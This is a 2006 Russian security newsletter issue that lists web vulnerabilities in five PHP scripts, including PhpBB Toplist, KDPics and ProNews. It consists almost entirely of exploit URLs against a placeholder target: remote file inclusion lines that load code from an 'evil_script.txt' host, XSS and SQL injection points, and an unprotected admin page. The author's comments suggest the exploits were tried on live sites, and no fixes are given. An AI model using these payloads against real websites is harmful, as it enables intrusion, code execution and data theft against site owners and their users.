Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в PhpBB Toplist, KDPics, (comp.paper.supuser) : Рассылка : Subscribe.Ru

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в PhpBB Toplist, KDPics,

IT-безопасность в быту и не только

Рассылка закрыта

Статистика

Отправляет email-рассылки с помощью сервиса Sendsay

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

← Декабрь 2006 →
	1	2 02.12.2006 04:45:17 12:05:26	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30	31

Автор

Forester

1.394 подписчиков
-1 за неделю

← Все выпуски →

← Декабрь 2006 →

2 02.12.2006 04:45:17 12:05:26

Компьютер для продвинутых пользователей

В этом выпуске:

PhpBB Toplist | KDPics | ProNews | Messageriescripthp | AnnonceScriptHP

ПО: PhpBB Toplist
Версия: 1.3.6

Уязвимсоть:
Возможность провети XSS-атаку.
Использование:
1. Добавить новый сайт.
2. В полях Имя(Name) и Информация(Information) можно вставить скрипт.
Комментарий::
Уязвимость на момент публикации ещё актуальна.

ПО: KDPics
Версия: 1.16

Уязвимость:
http://[цель]/[kdpics_path]/index.php3?page=http://evil_script.txt?
http://[цель]/[kdpics_path]/authenticate.inc.php3?lib_path=http://evil_script.txt?
http://[цель]/[kdpics_path]/lib/exifer/exif.php?lib_path=http://evil_script.txt?
http://[цель]/[kdpics_path]/index.php3?page=galeries&categories=[XSS]
http://[цель]/[kdpics_path]/galeries.inc.php3?categories=[XSS]
Комментарий::
XSS работают, а вот внедрить файлы не удалось.

ПО: ProNews
Версия: 1.5
Сайт: http://www.scripthp.com/

Использование:
http://[цель]/[script_news_path]/admin/change.php?pseudo=[XSS]&email=">[XSS]&date=[XSS]&sujet=[XSS]&message=[XSS]&site=">[XSS]<foo &lien=[XSS]&aa=[existing_news_id]
http://[цель]/[script_news_path]/lire-avis.php?aa=[XSS]
http://[цель]/[script_news_path]/lire-avis.php?aa=[SQL INJECTION]
Комментарий::
Продукт на сайтах не нашёл.

ПО: Messageriescripthp
Версия: 2.0
Сайт: http://www.scripthp.com/

Использование:
http://[цель]/[script_messagerie_path]/lire-avis.php?aa=[SQL INJECTION]
http://[цель]/[script_messagerie_path]/existepseudo.php?pseudo=[XSS]
http://[цель]/[script_messagerie_path]/existeemail.php?email=[XSS]
http://[цель]/[script_messagerie_path]/Contact/contact.php?pageName=</title>[XSS]
http://[цель]/[script_messagerie_path]/Contact/contact.php?cssform=">[XSS]<foo
Комментарий::
Продукт на сайтах не нашёл.

ПО: AnnonceScriptHP
Версия: 2.0
Сайт: http://www.scripthp.com

Использование:
http://[цель]/[script_annonce_path]/admin/admin_membre/fiche_membre.php?idmembre=1
http://[цель]/[script_annonce_path]/email.php?id=[SQL INJECTION]
http://[цель]/[script_annonce_path]/voirannonce.php?no=[SQL INJECTION]
http://[цель]/[script_annonce_path]/admin/admin_annonce/okvalannonce.php?idannonce=[SQL INJECTION]
http://[цель]/[script_annonce_path]/admin/admin_membre/fiche_membre.php?idmembre=[SQL INJECTION]
http://[цель]/[script_annonce_path]/admin/admin_annonce/changeannonce.php?idannonce=[SQL INJECTION]
http://[цель]/[script_annonce_path]/erreurinscription.php?email=[XSS]
http://[цель]/[script_annonce_path]/Templates/admin.dwt.php?email=[XSS]
http://[цель]/[script_annonce_path]/Templates/commun.dwt.php?email=[XSS]
http://[цель]/[script_annonce_path]/Templates/membre.dwt.php?email=[XSS]
http://[цель]/[script_annonce_path]/admin/admin_config/Aide.php?email=[XSS]
Комментарий::
Продукт на сайтах не нашёл.

Не забудьте проголосовать за выпуск!

Рассылка создана и ведется при поддержке Информационной сети Пермского края.

Меня можно найти:	ICQ - 273214003
	e-mail - isdmi1::mail.ru

В избранное